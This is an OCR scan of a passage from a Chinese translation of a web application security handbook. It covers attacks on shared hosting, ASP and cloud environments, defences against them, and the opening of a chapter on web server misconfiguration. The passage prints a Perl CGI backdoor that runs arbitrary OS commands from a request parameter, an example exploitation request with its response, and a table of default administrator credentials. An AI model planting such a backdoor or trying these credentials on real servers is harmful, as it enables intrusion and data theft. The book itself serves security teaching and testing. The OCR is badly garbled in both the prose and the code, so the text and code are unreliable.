零售 商 布 望 癌 顾客 提供 店内 文 付 卡 与 信贷 服务 .这些 零售 商 将 这 项 服务 外 包 给 奉 干 不 同 的 信用 卡 
提供 商 ， 其 中 许多 提供 商 为 新 创办 的 企业 ， 而 非 历 史 悠 久 的 知名 银行 。 这 些 信用 卡 提供 商 提 供 一 
种 商品 化 服务 ， 而 成 本 是 其 中 一 个 关键 的 苑 争 因 素 。 因 此 ,许多 提供 商 使 用 一 家 ASP 为 终端 用 户 
提供 Web 应 用 程序 。 因 此 ， 每 一 家 ASP 虱 对 相同 的 应 用 程序 进行 定制 处 理 ， 以 满足 大 量 不 同 等 售 
商 的 需求 。 



























































17.2 ”共享 主机 与 应 用 程序 服务 提供 商 485 





图 17-5 说 明了 这 种 服务 的 典型 组 织 结构 与 责任 划分 。 从 不 同 代 理 商 与 相关 任务 的 角度 看 ,这 
种 服务 存在 与 共享 主机 基本 模型 相同 的 安全 问题 , 但 这 些 问题 可 能 更 复杂 。 而且 ,这 种 服务 还 存 
在 其 他 特殊 的 问题 ， 如 17.2.3 节 所 述 。 












主机 和 维护 架构 ， 开 发 核心 
应 用 程序 ， 提 供 更 新 和 支持 


按照 商业 需求 
定制 核心 功能 









信用 卡 公司 
定制 外 层 应 用 程序 
和 非 功 能 性 内 容 
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使 用 应 用 程序 了 
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17.2.3 ”攻击 共享 环境 


共 至 主机 与 ASP 环 境 引 入 一 系列 新 的 潜在 源 洞 , 攻击 者 可 利用 它们 针对 共 圣 基础 洋 构 中 的 一 
个 或 几 个 应 用 程序 进行 攻击 。 

1. 针对 访问 机 制 的 攻击 

因为 各 种 外 部 组 织 需 要 更 新 与 定制 共 至 环境 中 的 不 同 应 用 程序 , 提供 商 必 须 执行 实现 这 种 远 
程 访问 的 机 制 。 在 最 简单 的 虚拟 主机 Web 站 点 中 ，FTP 或 SCP 之 类 的 上 传 工具 即 可 达到 这 种 目的 ， 
客户 通过 它们 在 自己 的 Web 根 目录 中 写 和 人 文件。 

如 朱 主 机 服务 提供 一 个 数据 库 ， 客 户 可 能 需要 百 接 访 问 数据 库 ， 以 配置 数据 库 说 置 ， 获 取 应 
用 程 厅 保存 的 数据 。 这 时 ,提供 商 可 执行 一 个 实现 某 些 数据 库 管 理 功能 的 接口 ,或 者 通过 因特网 
提供 数据 库 服 务 ， 人 允许 客户 直接 建立 连接 ， 并 使 用 他 们 目 己 的 工具 。 

在 成 熟 的 ASP 环 境 中 , 各 种 类 型 的 客户 需要 对 共享 应 用 程序 的 组 件 进行 不 同 程度 的 定制 ,这 
时 ,提供 商 通 帝 会 运行 功能 强大 的 应 用 程序 , 玫 助 客户 完成 这 些 任务 。 通 币 ,通过 一 个 VPN( Virtual 
Private Network, 虚拟 专用 网 络 ) 或 一 个 连接 ASP 基 础 架构 的 专用 连接 , 就 可 以 访问 这 些 应 用 程序 。 

根据 远程 访问 机 制 所 涵盖 的 范围 ， 攻 击 痢 可 针对 共 至 环境 实施 各 种 不 同 的 攻击 。 

口 远程 访问 机 制 本 里 并 不 安全 。 例 如 ，FTP 协 议 未 加 密使 得 处 在 适当 位 置 ( 例如 ， 在 客户 

目 己 的 ISP 内 ) 的 攻击 者 能 够 截获 登录 证 书 。 访 问 机 制 中 还 可 能 包含 未 打 补 丁 的 软件 漏 润 
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或 配置 缺陷 ， 使 得 匿名 攻击 者 能 够 避 开 访问 机 制 ， 破 坏 客户 的 应 用 程序 和 数据 。 

口 远程 访问 机 制 许可 的 访问 可 能 过 于 宽泛 ， 或 者 未 能 对 客户 进行 适当 的 隅 离 。 例 如 ， 当 用 
户 只 需要 文件 访问 时 , 访问 机 制 可 能 会 为 用 户 提供 一 个 命令 shell。 另 外 , 访问 机 制 可 能 3 
没有 限制 客户 只 能 访问 目 己 的 目录 ; 相反 ， 却 允许 他 们 更 新 其 他 客户 的 内 容 ， 或 者 访问 
服务 硕 操 作 系 统 中 的 敏感 文件 。 

口 在 文件 系统 访问 方面 ， 同 样 的 注意 事项 也 适用 于 数据 库 。 访 问 机 制 可 能 没有 对 数据 库 进 
行 适当 的 隅 离 ， 为 每 名 客户 提供 不 同 权限 的 账户 。 和 直接 数据 库 连 接 可 能 使 用 标准 ODBC 
之 类 的 非 加 密 渠 道 来 实现 。 

口 如 来 部 署 一 个 定制 应 用 程序 实现 远程 访问 ( 例如， 通过 一 家 ASP )， 这 个 应 用 程序 必须 负 
责 探 制 不 同 客户 对 共享 应 用 程序 的 访问 。 管 理应 用 程序 中 存在 的 任何 漏洞 都 可 能 会 导致 
亚 意 客户 ， 甚 至 是 匿名 用 户 破 坏 其 他 客户 的 应 用 程序 ， 还 会 使 拥有 有 限 权 限 的 客户 能 够 
观 新 应 用 程序 的 皮肤 ， 从 而 提升 其 权限 ,或 者 修改 应 用 程序 核心 功能 组 件 ， 以 实现 他 们 
的 目的 。 如 来 部 著 了 这 种 类 型 的 管理 应 用 程序 ， 那 么 该 应 用 程序 中 存在 的 任何 汤 洞 都 可 
能 会 导致 针对 终端 用 户 访 问 的 共 至 应 用 程序 的 攻击 。 

2. 应 用 程序 间 的 攻击 

在 一 个 共 至 主机 环境 中 , 不 同 的 客户 通 凋 需要 回 服 务 天 合法 上 传 并 执行 任意 脚本 。 这 会 导致 

单 主机 应 用 程序 中 并 不 存在 的 问题 。 
® DUD0OU 
在 最 明显 的 攻击 中 , 恶意 客户 可 能 会 上 传 攻击 服务 带 目 身 或 其 他 客户 应 用 程序 的 内 容 。 例 如 ， 
下 面 的 Perl 脚本 在 服务 硕 上 运行 一 个 远程 命令 工具 : 


#1/usr/bin/perl 










































































use strict; 
USe CGI qaqw(:standard escapeHTML)., 
print header, start html (""),; 


if (param(}} {my Scommand = param("cmgd"); 


scommand= scommand : 


print "Scommand\n";} 
else {print start form()}; textfield("command");} 


print end html; 


从 因特网 上 访问 以 下 这 段 脚本 ， 客 户 就 能 够 在 服务 希 上 执行 任意 操作 系统 命令 : 


GET /scripts/backdoor.pl?cmd=whoami HTTP/1.1 





Host: wahh-maliciousapp .com 


HTTP/1.1] 200 OK 

Date: Sun, 03 Jul 2011 19:16:38 GMT 
Server: Apache/2.0.59 

Connection: close 


Content-Type: text/html; charset=ISO-8859-1 
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<IDOCTYPE html 

PUBLIC *-//W3C//DTD XHTML 1.0 Transitional//EN" 

"http: //www.w3 .org/TR/xhtml1l /DTD/xhtmll-transitional .dtad'"> 

<html xmlns="hNttp://Www WwW3 .org/1999/xhtml" 1 ang=”em-US Xml :lang="en-US’"> 
<head> 
<title>Untitled Document</title> 
<meta http-egquiv="Content-Type" content="text/html; charset=-iso-88359-1" /> 
</head> 
<body> 
apache 
</body> 
</html> 


由 于 恶意 客户 的 命令 以 Apache 用 户 的 号 份 执行 , 这 很 可 能 使 得 该 客户 能 够 访问 属于 共 孚 主机 
服务 其 他 客户 的 脚本 和 数据 。 

ASP 管理 的 共 至 应 用 程序 中 也 存在 这 种 威胁 。 昌 然 核心 应 用 程序 功能 由 ASP 控 制 并 更 新 , 但 
个 体 用 户 还 是 能 够 以 某 种 确定 的 方式 修改 这 项 功能 。 恶意 客户 可 以 在 他 们 控制 的 代码 中 引入 其 他 
人 难以 察 沉 的 后 门 ， 从 而 攻破 共享 应 用 程序 ， 访 问 其 他 客户 的 数据 。 





提示 “后门 脚本 可 以 用 大 多 数 Web 脚 本 语言 创建 。 和 欲 知 更 多 以 其 他 语言 编写 的 脚本 实 
JW | 例 ， 请 访问 : http://net-square.com/ papers/one way/one_way.html#4.0。 
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印 使 共享 环境 中 的 所 有 客户 全 祁 并 无 恶意 ,， 且 仪 上 传经 过 环境 所 有 者 确认 的 合法 脚本 , 但 如 
末 个 别 用 户 对 存在 于 应 用 程序 中 的 漏洞 并 不 知情 , 应 用 程序 之 间 的 攻击 仍 有 可 能 发 生 。 在 这 种 情 
况 下 , 亚 意 用 户 可 以 利用 茶 个 应 用 程序 中 的 漏洞 攻破 该 应 用 程序 以 及 共计 环境 中 的 所 有 其 他 应 用 
程序 。 许 多 常见 的 汤 洞 部 属于 这 种 类 型 ， 如 下 所 示 。 
口 攻击 者 可 以 利用 某 个 应 用 程序 中 的 SQL 注 入 漏洞 在 共 至 数据 库 中 执行 任意 SQL 查询 。 如 来 
没有 完全 隔离 访问 数据 库 的 不 同 客户 , 攻击 者 就 可 以 读 取 并 修改 所 有 应 用 程序 使 用 的 数据 。 
口 攻击 者 可 以 利用 某 个 应 用 程序 中 的 路 径 壳 历 漏洞 谈 取 或 写 人 服务 天 文件 系统 中 的 任意 文 
件 ， 包 括 那 些 属于 其 他 应 用 程序 的 文件 。 
口 攻击 者 可 以 采用 与 前 面 描述 的 恶意 客户 使 用 的 方法 类 似 的 方法 ,利用 某 个 应 用 程序 中 的 
命令 注入 漏洞 攻破 服务 带 以 及 服务 带 上 运行 的 其 他 应 用 程序 。 
® ASPUDDOUDUUUUUUO 
前 面 描述 的 各 种 攻击 全 部 可 能 会 在 共 至 ASP 应 用 程序 中 发 生 。 由 于 客户 可 以 按照 日 己 的 需求 
对 核心 应 用 程序 功能 进行 定制 , 因此 定制 应 用 程序 的 用 户 可 以 利用 某 名 客户 引入 的 源 洞 攻击 主 共 
齐 应 用 程序 ， 从 而 稻 取 所 有 ASP 客 户 的 数据 。 
除 这 些 攻击 以 外 , 由 于 共 这 应 用 程序 的 各 种 组 件 必须 彼此 交互 ， 因 而 恶意 客户 或 用 户 能 够 攻 
破 其 他 共 至 的 应 用 程序 ， 如 下 所 示 。 
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口 由 不 同 应 用 程序 生成 的 数据 通常 被 分 配 到 一 个 公共 的 位 置 , 可 以 被 共享 应 用 程序 中 拥有 
较 高 权限 的 ASP 级 用 户 查 看 。 这 意味 者 攻击 者 可 以 利用 定制 应 用 程序 中 存在 的 XSS 源 洞 
攻破 共享 应 用 程序 。 例 如 ， 如 果 攻 击 者 能 够 在 日 志文 件 条 目 、 文 付 记 录 或 者 个 人 联系 信 
县 中 注入 JavaScript 代 码 , 他 们 就 可 以 动 持 一 名 ASP 级 用 户 的 会 话 , 从 而 访问 敏感 的 管理 
功能 。 

口 ASP 通 常 使 用 一 个 共享 数据 库 保存 所 有 客户 的 数据 ,应 用 程序 与 数据 库 层面 是 否 对 数据 访 
问 实 施 了 严格 的 隔离 ， 这 一 点 无 法 确定 。 但 是 ， 无 论 是 哪 一 种 情况 ， 都 会 存在 一 些 共享 
组 件 ， 如 数据 库存 储 过 程 ， 它 们 负责 处 理 属 于 多 名 客户 的 数据 。 亚 意 客 户 或 用 户 可 以 利 
用 这 些 组 件 中 存在 的 有 缺陷 的 信任 关系 或 漏洞 访问 其 他 应 用 程序 中 的 数据 。 例 如 ， 一 个 
定义 者 权限 共享 存储 过 程 中 的 SQL 注入 漏洞 可 能 会 导致 整个 共 且 数据 库 被 攻破 。 
























































渗透 测试 步骤 
(1) 检查 为 共 邓 环境 中 的 客户 提供 的 、 便 于 他 们 更 新 和 管理 内 容 与 功能 的 访问 机 制 。 考 感 
以 下 问题 。 
口 远程 访问 机 制 是 否 使 用 一 个 安全 的 协议 与 经 过 适当 强化 的 基础 架构 ? 











口 客户 是 否 能 够 访问 他 们 正 第 情况 下 不 能 访问 的 文件 、 数 据 及 其 他 资源 ? 
DO 客户 是 否 能 够 在 主机 环境 中 获得 一 个 交互 式 的 shell， 并 执行 任意 命令 ? 

(2) 如 宋 使 用 一 个 所 有 权 应 用 程序 ， 以 方便 客户 配置 和 定制 共享 环境 ， 考 虑 是 否 能 够 以 这 
个 应 用 程序 为 攻击 目标 ， 攻 破 该 环境 本 身 及 其 中 运行 的 所 有 应 用 程序 。 

(3) 如 果 能 够 在 某 个 应 用 程序 中 执行 命令 、 注 入 SQL 脚本 或 访问 任意 文件 ， 仔 细 人 研究 ， 看 
征 否 能 够 以 此 扩大 攻击 范围 ， 攻 破 其 他 应 用 程序 。 

(4) 如 果 渗 透 测试 员 正 在 攻击 一 个 使 用 ASP 主 机 的 应 用 程序 ， 且 该 应 用 程序 由 许多 共 至 与 
定制 组 件 构成 , 确定 其 中 的 任何 共享 组 件 ， 如 日 志 机 制 、 管 理 功 能 以 及 数据 库 代码 组 件 ， 党 试 
利用 这 些 组 件 攻 破 应 用 程序 的 共 齐 部分， 进而 攻破 其 他 应 用 程序 。 

(5) 如 末 所 有 共享 环境 使 用 一 个 第 用 的 数据 库 ， 使 用 NGSSquirrel 之 类 的 数据 库 扫 摘 工 具 ， 
对 数据 库 配 置 、 补 丁 级 别 、 表 结构 以 及 许可 进行 全 面 审查 。 数 据 库 安全 模型 中 存在 的 任何 缺陷 
都 可 以 被 加 以 利用 ,将 攻击 范围 由 一 个 应 用 程序 扩大 到 为 一 个 应 用 程序 。 























3. 攻击 云 

基本 上 ， 热 门 词汇 “ 云 ” 是 指 越 来 越 多 地 将 应 用 程序 、 服 务 需 、 数 据 库 和 人 硬件 外 包 给 外 部 服 
务 提 供 商 。 此 外 ， 它 也 指 目前 共 胖 托管 环境 的 高 度 虚 拟 化 。 

从 广义 上 讲 ， 云 服务 是 指 提 供 API、 应 用 程序 或 用 于 客户 交互 的 Web 界 面 的 基于 因特网 的 按 
震 服 务 。 通 销 ， 云 计算 提供 商会 存储 用 户 数据 或 处 理 业 务 逻 辑 来 提供 相关 服务 。 从 终端 用 户 的 角 
度 看 , 传统 的 喝 面 应 用 程序 将 升级 为 基于 云 的 应 用 程序 , 各 种 企业 可 能 会 用 按 需 服务 来 蔡 代 所 有 
服务 右 。 
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在 迁移 到 云 服务 的 过 程 中 , 缺乏 控制 是 一 个 经 党 被 提 及 的 安全 问题 。 与 传统 的 服务 带 或 果 面 
软件 不 同 , 用 户 没 有 办 法 提前 评 佑 特定 云 服务 的 安全 性 ， 而 需要 将 管理 服务 和 数据 的 所 有 责任 交 
给 第 三 方 。 对 企业 而 言 ,他 们 和 需要 将 更 多 控制 托付 给 某 个 环境 ， 而 该 环境 包含 的 风险 却 无 法 完全 
定性 或 量化 。 巾 于 基于 Web 的 平台 并 不 像 传统 的 客户 端 /服务 骨 可 下 载 的 产品 那样 经 过 严格 的 测 
试 ， 因 此 ， 在 支持 云 服 务 的 Web 应 用 程序 中 发 现 的 汤 洞 也 往往 不 为 人 们 所 了 解 。 

这 种 对 缺乏 控制 的 担心 ,与 当前 企业 在 选择 托管 服务 提供 商 、 或 用 户 在 选择 Web 邮 件 服务 商 
时 的 担忧 类 似 。 但 是 ,仅仅 这 种 担忧 并 不 能 反映 云 计 算 市 来 的 日 益 严 重 的 安全 风险 。 攻 破 一 个 
传统 的 Web 应 用 程序 可 能 会 影响 到 成 二 上 万 名 个 体 用 户 ， 但 攻破 云 服 务 却 可 能 影响 到 成 二 上 万 
名 云 订阅 用 户 及 其 用 户 群 体 。 虽 然 存 在 缺陷 的 访问 控制 会 使 攻击 者 能 够 未 授权 访问 工作 流程 应 
用 程序 中 的 敏感 文档 ,但 在 云 日 助 服务 应 用 程序 中 ， 这 种 缺陷 可 能 会 导致 攻击 痢 能 够 未 授权 访 
问 服务 贞 或 服务 占 集 和 群 。 利用 管理 后 端 门户 云 服 务 中 的 同一 漏洞 , 攻击 者 甚至 能 够 访问 整个 企业 
基础 淋 构 。 

® Webp DUUDUUUUUUD 

由 于 定义 不 明确 , 每 个 云 服务 提供 商 的 实施 方式 各 不 相同 , 因此 并 没有 适用 于 所 有 云 体 系 染 
构 的 湄 洞 列表 。 但 是 ， 我 们 仍然 可 以 确定 一 些 专 门 针 对 云 计 算 体系 染 构 的 主要 漏洞 区 域 。 












































注解 ”关于 云 安 全 ， 人 们 经 常 提 到 的 一 种 防御 机 制 是 静态 或 动态 数据 加 密 。 但 是 ， 在 
这 种 情况 下 ， 加 密 只 能 提供 最 低 限 度 的 保护 。 如 17.1 节 所 述 ， 如 果 攻 击 者 避 开 应 用 程 


序 的 身份 验证 或 授权 检查 ， 针 对 数据 提出 看 似 合 法 的 请 求 ， 栈 中 的 组 件 就 会 自动 调用 
任何 解密 功能 。 





®0DUUD0 

在 使 用 粒 生 成 随机 数字 时 , 许多 应 用 程序 依赖 操作 系统 的 功能 来 执行 这 一 操作 。 利用 的 精 源 
大 多 与 系统 本 里 的 功能 有 关 ， 如 系统 正常 运行 时 间 ， 或 有 关系 统 硬 件 的 信息 。 如 果 系 统 被 克隆 ， 
拥有 其 中 一 个 元 隆 系统 的 攻击 者 束 可 以 确定 用 于 生成 随机 数 子 的 燃 源 , 这 些 信息 又 可 用 于 更 准确 
地 预测 随机 数字 发 生 带 的 状态 。 

sDUDUUUUUUD 

用 于 配置 和 监视 服务 天 的 界面 是 企业 云 计 算 服 务 的 核心 应 用 。 对 用 户 而 言 ， 该 界面 是 一 个 目 
助 环境 ,， 通 笛 是 最 初 用 于 内 部 服务 天 管理 的 工具 的 Web 版 本 。 以 前 连接 到 网 络 的 独立 工具 往往 缺 
乏 可 菲 的 会 话 管 理 和 访问 控制 机 制 , 在 没有 预先 采用 基于 角色 的 隔离 的 情况 下 更 是 如 此 。 笔 者 曾 
发 现 一 些 将 令 牌 或 GUID 用 于 服务 天 访问 的 情况 。 在 其 他 情况 下 ， 应 用 程序 仅仅 通过 序列 化 接口 
来 调用 任何 管理 方法 。 

elUUUDUUDU 

和 大 多 数 新 技术 一 样 , 云 服 务 提供 商 采 用 功能 优先 的 方法 来 吸引 新 用 户 。 从 企业 的 角度 来 看 ， 
云 环 境 几 乎 总 是 通过 目 助 Web 应 用 程序 管理 。 用 户 获 得 一 系列 用 户 友好 的 方法 ,并 通过 这 些 方法 
来 访问 数据 。 云 服务 通常 并 不 提供 功能 “退出 ”机 制 。 
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si 和 时 时 

用 户 需 要 定期 调用 大 量 云 资 源 ， 为 此 , 用 户 需 要 在 客户 端 上 存储 一 个 永久 刁 份 验证 令 牌 ， 以 
人 饭 输 入 密码 ， 并 用 于 标识 设备 ( 相对 于 用 户 )。 如 采 攻 击 者 能 够 访问 该 令 牌 ， 就 可 以 信 此 访问 用 
户 的 云 资 源 。 

@ Webl] | 

Web 和 存储 是 云 计算 吸引 终 问 用 户 的 优势 之 一 。 为 发 挥 效 座 ，Web 存 储 必须 支持 某 种 标准 的 浏 
览 器 或 浏览 器 扩展 、 一 系列 技术 和 HTTP 扩 展 (如 WebDAV )， 并 且 通 常 需要 支持 存 人 缓存 或 基于 
令 牌 的 证 书 〈( 如 上 所 述 )。 

此 外 ， 域 上 的 Web 服 务 硕 通 稼 可 以 通过 因特网 访问 。 如 采 某 个 用 户 可 以 上 传 HTML 文 件 并 诱 
使 其 他 用 户 访问 其 上 传 的 文件 ,他 就 可 以 攻破 这 些 使 用 同一 服务 的 用 户 。 与 此 类 似 , 攻击 者 可 以 
利用 Java 同 源 蛇 略 并 上 传 一 个 JAR 文 件 ， 从 而 在 该 文件 被 因特网 上 的 其 他 位 置 调用 时 实现 完全 的 
双 回 交互 。 














17.2.4 ”保障 共享 环境 的 安全 


由 于 使 用 相同 工具 的 客户 可 能 怀 有 恶意 企图 , 以 及 不 知情 的 客户 可 能 无 意 中 在 环境 中 引入 漏 
洞 ， 因此， 共享 环境 给 应 用 程序 安全 之 来 了 新 的 威胁 。 为 解决 这 种 双重 威胁 ,设计 共享 环境 时 必 
须 仔 细 处 理 客户 访问 、 隅 离 与 信任 关系 ， 并 实施 并 不 直接 适用 于 单 主 机 应 用 程序 的 控制 。 

1. 保障 客户 访问 的 安全 

无 论 向 客户 提供 何 种 机 制 来 帮助 他 们 维护 自己 控制 的 内 容 , 都 应 防止 这 种 机 制 被 第 三 方 和 恶 
意 客 户 未 授权 访问 。 

口 远程 访问 机 制 应 实施 严格 的 身份 确认 ， 使 用 难以 禄 听 的 加 蜜 技术， 并 进行 充分 的 安全 强 

化 。 

口 仅 准 予 个 体 用 户 最 低 的 访问 权限 。 例 如 ， 如 果 一 名 客户 需要 回 一 人 台 虚 拟 主机 服务 器 上 传 
脚本 ， 就 应 仅 辐 他 分 配 读 取 与 写 人 他 自己 的 文档 根 目 录 的 访问 权限 。 如 果 需 要 访问 一 个 
共享 数据 库 ， 就 应 使 用 一 个 无 法 访问 属于 其 他 客户 的 数据 或 其 他 组 件 的 低 权 限 账 户 进 行 
访问 。 

口 如 果 使 用 一 个 定制 的 应 用 程序 提供 客户 访问 ， 该 应 用 程序 必须 满足 严格 的 安全 需求 ， 并 

根据 它 在 保护 共享 环境 安全 中 发 挥 的 作用 进行 测试 。 

2. 隔离 客户 功能 

不 能 信任 共享 环境 中 的 客户 ， 认 为 他 们 仅 建 立 没 有 漏洞 的 无 害 功 能 。 因 此 ,稳定 可 靠 的 解决 
方案 是 应 使 用 本 章 前 半 部 分 描述 的 架构 控制 来 保护 共享 环境 及 其 客户 , 避免 受到 通过 不 当 内 容 实 
施 的 攻击 。 这 要 求 隔离 给 予 每 名 客户 的 功能 ， 确 保 将 任何 有 意 或 无 意 攻击 的 影响 限制 在 局 部 , 使 
其 不 会 伤害 其 他 客户 。 

口 每 名 客户 的 应 用 程序 应 使 用 一 个 独立 的 操作 系统 账户 访问 文件 系统 ， 该 账户 仪 拥 有 读 取 

与 写 信 应 用 程序 文件 路 径 的 权限 。 
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口 强大 系统 功能 与 命令 的 访问 权限 应 仪 限 于 操作 系统 等 级 ， 且 应 只 分 配 所 需 的 最 低 权 限 。 
口 应 在 任何 共 至 数据 库 中 实施 相同 的 保护 措施 。 应 为 每 名 客户 使 用 一 个 单独 的 数据 库 实例 ， 
仅 回 客户 分 配 低 权限 的 账户 ， 只 人 允许 他 们 访问 目 己 的 数据 。 








注解 ”许多 基于 LAMP 模 型 的 共享 主机 环境 依靠 PHP 安 全 模式 来 限制 某 

击 脚本 的 潜在 影响 。 这 种 模式 防止 PHP 脚 本 访问 某 些 强大 的 PHP 函 数 ne 
操作 实施 限制 (请 参阅 第 19 章 了 解 相关 内 容 )，。 然 而 ,这些 限制 并 非 完 全 有 效 ， 而 且 非 
常 容易 避 开 。 虽 然 安全 模式 能 够 提供 有 用 的 防 第， 但 由 于 它 需 要 操作 系统 信任 应 用 程 
序 层 ， 以 控制 它 的 操作 ， 因 此 ， 从 架构 上 讲 ， 在 这 里 控制 恶意 或 易 受 攻击 的 应 用 程序 
造成 的 影响 并 不 合适 。 由 于 这 个 及 其 他 原因 ， 和 人 全 和 模 立 ce 


提示 “如果 能 够 在 服务 器 上 执行 任意 PHP 命 令 ， 可 使 用 phpinfo() 命 令 返回 PHP 环 境 的 





配置 信息 。 可 以 检查 这 些 信 是 否 激活 安全 模式 ， 以 及 其 他 配置 选项 如 何 
影响 执行 的 操作 。 请 参阅 第 更 多 详情 。 


3. 隔离 共 圣 应 用 程序 中 的 组 件 

在 ASP 环 境 中 , 应 用 程序 包含 各 种 共享 与 定制 的 组 件 ， 这 时 应 在 各 方 控制 的 组 件 之 间 实 施 信 
任 边界 。 如 采 一 个 数据 库存 储 过 程 之 类 的 共 宇 组 件 接收 从 茶 一 名 客户 的 定制 组 件 发 出 的 数据 , 那 
么 就 不 应 信任 这 些 数据 , 就 好 像 它们 是 由 终端 用 户 送 出 的 一 样 。 每 个 组 件 都 应 对 它 的 信任 边界 以 
外 的 相 邻 组 件 进行 严格 的 安全 测试 , 确定 其 中 存在 的 、 攻 击 者 可 以 利用 易 受 攻击 的 组 件 或 屎 意 组 
件 攻 破 其 他 应 用 程序 的 漏洞。 应 特别 注意 共 至 日 志 与 管理 功能 。 




















17.3 小结 


Web 应 用 程序 架构 中 实施 的 安全 控制 可 帮助 应 用 程序 所 有 者 显著 改善 他 们 部 署 的 应 用 程序 
的 安全 状态 。 但是， 如 果 应 用 程序 架构 中 存在 屿 陷 与 政 忽 ， 攻击 者 就 可 以 利用 它们 进一步 扩大 攻 
击 范 围 ， 通过 一 个 组 件 攻击 另 一 个 组 件 ， 最 终 攻 破 整个 应 用 程序 。 

为 一 方面 ,共享 主机 与 基于 ASP 的 环境 也 引发 了 一 系列 新 的 、 难 以 解决 的 安全 问题 ,包括 单 
主机 应 用 程序 中 并 不 存在 的 信任 边界 。 如 果 攻 击 者 想 要 攻击 共享 环境 中 的 一 个 应 用 程序 , 他 就 应 
该 集中 精力 对 共享 环境 实施 攻击 ,确定 是 否 可 以 通过 其 中 的 某 个 应 用 程序 攻破 这 个 环境 ， 或 者 利 
用 一 个 兄 受 攻击 的 应 用 程序 攻击 其 他 应 用 程序 。 

















17.4 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh。 
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(1) 假设 受 攻击 的 应 用 程序 使 用 两 台 不 同 的 服务 器 : 一 台 应 用 程序 服务 器 和 一 台数 据 库 服务 
器 。 已 经 发 现 一 个 漏洞 ,可 以 在 应 用 程序 服务 器 上 执行 任意 操作 系统 命令 。 是 否 可 以 利用 这 个 漏 
洞 获 取保 存在 数据 库 中 的 敏感 应 用 程序 数据 ? 

(2) 在 另外 一 种 情形 中 发 现 了 一 个 SQL 注入 漏洞 ， 可 以 利用 它 在 数据 库 服 务 器 上 执行 任意 操 
作 系 统 命令 。 是否 可 以 利用 这 个 漏洞 攻破 应 用 程序 服务 器 ?例如 ,是 否 可 以 修改 保存 在 应 用 程序 
服务 器 中 的 应 用 程序 脚本 以 及 回 用 户 返 回 的 内 容 ? 

(3) 在 攻击 共享 环境 中 的 一 个 Web 应 用 程序 时 ， 与 ISP 签 订 合 约 后 ， 在 所 针对 的 同一 台 服 务 器 
上 获得 了 一 些 Web 空 间 ， 可 以 同 其 中 上 传 PHP 脚 本 。 

是 否 可 以 利用 这 种 情况 攻破 目标 应 用 程序 ? 

(4) Linux、Apache 、MySQL 与 PHP 等 染 构 组 件 和 常安 闭 在 同一 台 物 理 服 务 絮 上 。 为 何 这 样 做 会 
削弱 应 用 程序 架构 的 安全 状况 ? 

(5) 如 何 找到 证 据 来 证 明 所 攻击 的 应 用 程序 由 某 个 应 用 程序 服务 提供 商 托管 ? 






























































攻击 Web 服 务 器 





任何 其 他 应 用 程序 一 样 ，Web 应 用 程序 也 依赖 于 文 持 它 的 其 他 技术 栈 〈technology 

”= stack ),， 包括 Web 服 务 融 、 操 作 系 统 与 网 络 基础 洪 构 。 这 些 组 件 中 的 任何 一 个 郡 可 能 成 
为 攻击 者 的 目标 ， 应 用 程序 依赖 的 技术 往往 可 使 攻击 者 能 够 完全 攻破 整个 应 用 程序 。 

本 书 主要 讨论 渗透 测试 员 如 何 攻击 Web 应 用 程序 , 因此 大 多 数 上 述 类 型 的 攻击 不 在 本 书 的 讨 
论 泡 围 之 内 , 但 针对 Web 服 务 冲 层 的 攻击 以 及 相关 应 用 程序 层 的 防御 是 个 例外 。 内 联防 御 通 闸 用 
于 保障 Web 应 用 程序 的 安全 及 识别 攻击 。 避 开 这 些 防御 是 攻破 应 用 程序 的 关键 步 又 。 

迄今 为 止 ， 我 们 并 未 对 Web 服 务 表 与 应 用 程序 服务 髓 进行 区 分 ， 因 为 各 种 攻击 主要 针对 的 是 
应 用 程序 的 功能 ,无 论 应 用 程序 以 何 种 方式 提供 这 些 功 能 。 实际 上 ， 大 部 分 表示 层 、 与 后 问 组 件 
的 通信 ， 以 及 核心 安全 框架 都 可 能 由 应 用 程序 容 从 管理。 这 就 进一步 扩大 了 攻击 范围 。 很 明显 ， 
如 果实 现 这 些 框 架 的 技术 存在 任何 着 洞 , 可 用 于 直接 攻 破 应 用 程序 , 这 些 漏 洞 将 会 引起 攻击 者 的 
1 

本 章 主 要 讨论 如 何 利 用 Web 服 务 胡 中 存在 的 漏洞 攻 击 其 上 运行 的 Web 应 用 程序 。 当 攻击 Web 
服务 般 时 , 渗透 测试 员 可 以 利用 的 漏洞 分 为 两 大 类 : 服务 天 配置 缺陷 和 应 用 程序 服务 融 软 件 中 的 
安全 漏洞 。 相 关 独 润 的 列表 可 能 并 不 全 面 ， 因 为 这 类 软件 总 是 在 不 断 变化 ,但 本 章 介绍 的 漏洞 将 
说 明 各 种 应 用 程序 在 执行 日 己 的 本 地 扩展 、 模 块 或 API， 或 访问 外 部 功能 时 可 能 过 到 的 常见 危 
险 。 

在 本 革 中 ， 我 们 还 将 分 析 Web 应 用 程序 防火 墙 , 介绍 其 优 缺 点 ， 并 详细 说 明 如 何 突 破 这 些 防 
火 墙 以 实施 攻击 的 第 用 方法 。 



































18.1 Web 服务 器 配置 缺陷 


即使 最 简单 的 Web 服 务 胡 也 带 有 大 量 控制 其 行为 的 配置 选项 。 以 前 发 布 的 许多 服务 骨 含 有 不 
安全 的 默认 选项 ， 如 果 不 对 它们 进行 强化 ， 可 能 会 使 攻击 者 有 机 可 乘 。 


18.1.1 默认 证 书 


许多 Web 服 务 器 包含 可 被 公众 访问 的 管理 接口 。 这 些 接口 可 能 位 于 Web 根 目录 的 某 个 特定 位 
置 , 或 者 在 8080 或 8443 端 口上 运行 。 通常， 管理 接口 使 用 众所周知 的 默认 证 书 ， 这些 证 书 在 安装 
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时 不 需要 进行 修改 。 
一 些 最 第 见 的 管理 接口 的 默认 证 书 如 表 18-1 所 示 。 


表 18-1 一 些 常 见 管理 接口 的 默认 证 书 


用 万 名 密 码 
Apache Tomcat admin (无 ) 
tomcat tomcat 
root root 
Sun JavaServer admin admin 
Netscape Enterprise Server admin admin 
Compaq Insight Manager administrator administrator 
anonymous (无 ) 
user user 
operator operator 
user public 
Zeus admin (无 ) 





除 Web 服 务 硕 上 的 管理 接口 外 ,大 量 设备 〈 如 交换 机 、 打 印 机 与 无 线 接 入 点 ) 还 使 用 禁止 修 
改 其 默认 证 书 的 Web 接 口 。 以 下 资源 列 出 了 大 量 技术 的 上 默认 证 书 : 


DD www.cirt.net/passwords 





DQ www.phenoelit-us.org/dpl/dpl.html 





渗透 测试 步 双 


(1) 检查 应 用 程序 解析 过 程 中 得 到 的 结果 ， 确 定 应 用 程序 使 用 的 、 可 能 包含 可 访问 的 管理 





